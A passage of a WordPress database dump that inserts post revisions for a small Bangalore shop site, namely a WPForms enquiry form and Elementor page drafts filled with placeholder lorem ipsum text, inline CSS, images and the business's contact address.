INSERT INTO `wp_posts` VALUES (1528,1,'2022-10-03 12:54:18','2022-10-03 07:24:18','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}],\"id\":\"1527\",\"field_id\":3,\"settings\":{\"form_title\":\"Enquiry\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"antispam\":\"1\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Enquiry\",\"sender_name\":\"MangoMitra\",\"sender_address\":\"mango@homedirect.in\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"message_scroll\":\"1\",\"page\":\"560\",\"redirect\":\"\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}','Enquiry','','inherit','closed','closed','','1527-revision-v1','','','2022-10-03 12:54:18','2022-10-03 07:24:18','',1527,'https://gopalak.in/?p=1528',0,'revision','',0),(1529,1,'2022-10-03 12:54:26','2022-10-03 07:24:26','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}],\"id\":\"1527\",\"field_id\":3,\"settings\":{\"form_title\":\"Enquiry\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"antispam\":\"1\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Enquiry\",\"sender_name\":\"MangoMitra\",\"sender_address\":\"mango@homedirect.in\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"560\",\"redirect\":\"\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}','Enquiry','','inherit','closed','closed','','1527-revision-v1','','','2022-10-03 12:54:26','2022-10-03 07:24:26','',1527,'https://gopalak.in/?p=1529',0,'revision','',0),(1531,1,'2022-10-07 10:07:45','2022-10-07 04:37:45','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:07:45','2022-10-07 04:37:45','',1373,'https://gopalak.in/?p=1531',0,'revision','',0),(1532,1,'2022-10-07 10:07:45','2022-10-07 04:37:45','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:07:45','2022-10-07 04:37:45','',1373,'https://gopalak.in/?p=1532',0,'revision','',0),(1533,1,'2022-10-07 10:07:45','2022-10-07 04:37:45','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n		[wpforms id=\"1527\" title=\"false\" description=\"false\"]		\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-07 10:07:45','2022-10-07 04:37:45','',1373,'https://gopalak.in/?p=1533',0,'revision','',0),(1535,1,'2022-10-07 10:18:27','2022-10-07 04:48:27','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right 